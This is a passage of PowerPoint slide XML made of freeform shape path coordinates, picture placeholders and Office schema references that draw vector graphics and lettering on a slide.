                    <a:pt x="158990" y="3024"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="171104" y="7560"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="186246" y="12097"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="198359" y="16633"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="204416" y="19657"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="208959" y="22681"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="215016" y="25706"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="219558" y="30242"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="222587" y="34779"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="225615" y="39315"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="227129" y="45363"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="228643" y="49900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="228643" y="55948"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="227129" y="63509"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="219558" y="87703"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="211987" y="114921"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="202902" y="142140"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="196845" y="155749"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="190788" y="169358"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="184732" y="182967"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="177161" y="193552"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="169590" y="205649"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="162019" y="214722"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="152934" y="223795"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="146877" y="226819"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="143848" y="231356"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="137792" y="232868"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="131735" y="235892"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="127192" y="237404"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="121135" y="238916"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="116593" y="238916"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="112050" y="240428"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="102965" y="238916"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="93880" y="235892"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="84795" y="232868"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="75709" y="229843"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="66624" y="225307"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="51482" y="219259"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="45425" y="216234"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="39369" y="213210"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="34826" y="210186"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="30283" y="205649"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="25741" y="201113"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="21198" y="196577"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="18170" y="192040"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13627" y="185992"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10599" y="179943"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7570" y="173895"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4542" y="167846"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3028" y="161798"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1514" y="154237"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="148188"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="140628"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="133067"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="120970"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1514" y="110385"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4542" y="98288"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7570" y="87703"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13627" y="77118"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="18170" y="66533"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="24227" y="57460"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="31798" y="46876"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="39369" y="39315"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="48454" y="31754"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="57539" y="24194"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="68138" y="18145"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="78738" y="12097"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="89337" y="7560"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="99937" y="3024"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="112050" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="124164" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="136277" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="146877" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="158990" y="3024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8" name="object 22">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{01D9F402-25DA-B2FA-3B70-6AF54E7D8DA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14697" y="3107528"/>
              <a:ext cx="139306" cy="193552"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="29" name="object 23">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{27E14109-C7B2-ECE8-648E-1D41C9647D0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55643" y="3097749"/>
              <a:ext cx="278612" cy="400049"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic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E36E2CCE-79E2-9E75-F5DD-50BC7469699D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7396665" y="4099622"/>
              <a:ext cx="713105" cy="96520"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="713104" h="96520">
                  <a:moveTo>
                    <a:pt x="23306" y="4063"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="4063"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="94426"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="23306" y="94426"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="23306" y="54620"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="81034" y="54620"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="81034" y="37144"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="23306" y="37144"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="23306" y="4063"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="713104" h="96520">
                  <a:moveTo>
                    <a:pt x="81034" y="54620"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="57727" y="54620"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="57727" y="94426"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="81034" y="94426"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="81034" y="54620"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="713104" h="96520">
                  <a:moveTo>
                    <a:pt x="81034" y="4063"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="57727" y="4063"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="57727" y="37144"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="81034" y="37144"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="81034" y="4063"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="713104" h="96520">
                  <a:moveTo>
                    <a:pt x="168634" y="39319"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="135145" y="39319"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="139676" y="40050"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="145813" y="42915"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="147357" y="45516"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="147357" y="49641"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="140916" y="50007"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="134718" y="50576"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="100866" y="69921"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="100927" y="81259"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="103060" y="86237"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="111997" y="94426"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="112291" y="94426"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="117223" y="96255"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="126428" y="96255"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="128968" y="96011"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="147235" y="87213"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="168896" y="87213"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="168896" y="81442"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="131914" y="81442"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="129903" y="81259"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="127302" y="80487"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="126204" y="79898"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="125270" y="79085"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="124294" y="78272"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="123685" y="77419"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="123197" y="75651"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="123075" y="70957"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="123664" y="69230"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="147235" y="62443"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="168896" y="62443"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="168896" y="40050"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="168634" y="39319"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="713104" h="96520">
                  <a:moveTo>
                    <a:pt x="168896" y="87213"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="147235" y="87213"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="147235" y="94426"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="168896" y="94426"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="168896" y="87213"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="713104" h="96520">
                  <a:moveTo>
                    <a:pt x="168896" y="62443"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="147235" y="62443"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="147235" y="76606"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="145528" y="78049"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="143557" y="79227"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="138757" y="81117"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="138463" y="81117"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="136852" y="81442"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="168896" y="81442"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="168896" y="62443"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="713104" h="96520">
                  <a:moveTo>
                    <a:pt x="133702" y="24343"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="128480" y="24343"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="123278" y="24749"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="112875" y="26415"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="109116" y="27127"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="106820" y="27736"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="106820" y="44175"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="108811" y="44175"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="110599" y="43484"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="113525" y="42509"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="121449" y="40050"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="121234" y="40050"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="125554" y="39319"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="168634" y="39319"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="166132" y="33893"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="160605" y="30073"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="155825" y="27566"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="149745" y="25775"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="142701" y="24749"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="143537" y="24749"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="133702" y="24343"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="713104" h="96520">
                  <a:moveTo>
                    <a:pt x="230952" y="24404"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="221138" y="24404"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="216139" y="25054"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="186493" y="54274"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="186593" y="67177"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="215590" y="95544"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="221036" y="96255"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="231500" y="96255"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="235646" y="95768"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="243123" y="93878"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="246383" y="92699"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="250154" y="90972"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="250154" y="80649"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="221706" y="80649"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="217484" y="79085"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="217270" y="79085"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="210734" y="72156"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="209129" y="67177"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="209129" y="54274"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="210693" y="49255"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="216952" y="41838"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="221442" y="39989"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="250154" y="39989"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="250154" y="29850"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="246760" y="28244"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="243103" y="26923"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="235239" y="24891"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="230952" y="24404"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="713104" h="96520">
                  <a:moveTo>
                    <a:pt x="250154" y="72339"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="247065" y="72339"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="246171" y="73192"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="245216" y="74066"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="230363" y="80649"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="250154" y="80649"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="250154" y="72339"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="713104" h="96520">
                  <a:moveTo>
                    <a:pt x="250154" y="39989"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="229875" y="39989"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="232171" y="40294"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="236133" y="41452"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="247065" y="48483"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="250154" y="48483"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="250154" y="39989"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="713104" h="96520">
                  <a:moveTo>
                    <a:pt x="288700" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="266775" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="266775" y="94426"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="288700" y="94426"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="288700" y="72054"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="294593" y="64800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="319067" y="64800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="313334" y="56326"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="288700" y="56326"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="288700" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="713104" h="96520">
                  <a:moveTo>
                    <a:pt x="319067" y="64800"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="294593" y="64800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="313693" y="94426"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="339113" y="94426"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="319067" y="64800"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="713104" h="96520">
                  <a:moveTo>
                    <a:pt x="337366" y="26273"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="312169" y="26273"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="288700" y="56326"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="313334" y="56326"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="312880" y="55656"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="337366" y="26273"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="713104" h="96520">
                  <a:moveTo>
                    <a:pt x="386397" y="24160"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="350268" y="45625"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="347688" y="60756"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="348370" y="68788"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="372108" y="94020"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="372288" y="94020"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="380376" y="95677"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="390034" y="96255"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="395337" y="96255"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="400173" y="95808"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="408911" y="94020"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="413564" y="92577"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="418502" y="90606"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="418502" y="80893"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="385117" y="80893"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="379610" y="79471"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="372132" y="73822"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="370100" y="69738"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="369775" y="64393"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="419782" y="64393"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="419782" y="56733"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="419500" y="52752"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="419418" y="51592"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="369714" y="51592"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="370023" y="47020"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="370039" y="46776"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="371543" y="43261"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="374266" y="41086"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="376893" y="38953"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="380423" y="37815"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="415338" y="37815"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="415058" y="37219"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="411390" y="32552"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="406696" y="28883"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="400966" y="26261"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="394580" y="24774"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="395515" y="24774"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="386397" y="24160"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="713104" h="96520">
                  <a:moveTo>
                    <a:pt x="418502" y="73070"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="416063" y="73070"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="413564" y="74960"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="410150" y="76748"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="401494" y="80060"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="397024" y="80893"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="418502" y="80893"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="418502" y="73070"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="713104" h="96520">
                  <a:moveTo>
                    <a:pt x="415338" y="37815"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="389160" y="37815"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="392513" y="38953"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="394646" y="41269"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="396800" y="43566"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="397839" y="46776"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="397918" y="47020"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="398040" y="51592"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="419418" y="51592"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="419256" y="49311"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="417865" y="43566"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="417791" y="43261"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="417681" y="42806"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="415338" y="37815"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="713104" h="96520">
                  <a:moveTo>
                    <a:pt x="459588" y="26273"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="437683" y="26273"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="437683" y="94426"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="459588" y="94426"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="459588" y="48788"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="462331" y="47812"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="464891" y="47142"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="469646" y="46329"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="487080" y="46329"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="487080" y="36291"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="459588" y="36291"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="459588" y="26273"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="713104" h="96520">
                  <a:moveTo>
                    <a:pt x="487080" y="46329"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="480133" y="46329"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="482711" y="46532"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="484215" y="46776"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="485244" y="47142"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="487080" y="47142"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="487080" y="46329"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="713104" h="96520">
                  <a:moveTo>
                    <a:pt x="487080" y="26273"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="477777" y="26273"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="475661" y="26720"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="468569" y="29423"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="464383" y="32166"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="459588" y="36291"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="487080" y="36291"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="487080" y="26273"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="713104" h="96520">
                  <a:moveTo>
                    <a:pt x="590405" y="4063"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="546312" y="4063"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="546312" y="94426"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="569598" y="94426"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="569598" y="65003"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="590710" y="65003"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="617491" y="47934"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="569598" y="47934"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="569598" y="21193"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="619048" y="21193"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="616089" y="15463"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="613305" y="12395"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="606620" y="8026"/>
                  </a:lnTo>
                  <a:lnTo>
